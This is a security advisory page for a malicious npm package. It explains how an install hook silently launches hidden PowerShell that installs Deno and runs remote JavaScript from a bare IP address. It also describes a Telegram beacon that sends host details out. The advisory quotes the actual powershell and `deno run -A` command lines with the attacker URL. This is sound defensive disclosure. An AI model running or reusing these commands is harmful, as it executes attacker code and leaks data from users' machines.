Logo
npm

tailwind-gutenberg-block-zero@1.0.0

Vulnerability report · Last retrieved from osv.dev October 7, 2026 at 5:32 AM UTC

Malicious

OSV ID

MAL-2026-11044

Ecosystem

npm

Summary

package.json declares "install": "node setup.js", so setup.js runs automatically on npm install. setup.js writes a PowerShell script to the OS temp directory and launches it with start /min powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File... (windowsHide:true, detached:true), then exits within ~500ms to conceal the child process. The staged PowerShell script installs Scoop/winget, installs the Deno runtime, and runs deno run -A http://172.94.9.157/v028f8cde892b0b74c8.js — remote, unpinned JavaScript pulled over cleartext HTTP from a bare IP address and executed with Deno's -A all-permissions flag, giving arbitrary code full filesystem, network, environment, and subprocess access on the installer's machine. setup.js additionally collects os.hostname(), os.platform(), os.arch(), and a package identifier at install time and POSTs a [NEW INSTALLATION] beacon to api.telegram.org/bot<token>/sendMessage (bot token and chat id are blanked in this shipped variant but the exfil path is wired). The destination host is not the package's publisher, the runtime install is not the attack surface, and the fetched-and-executed remote JS is attacker-controlled; the cover story of a CMS Store Hub installation does not match the shipped behavior.

Source: amazon-inspector (dcdb0345912d382c162c8f389cd9b4cecdcad5a0940df166c4ffdc6bbcf2dbff)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.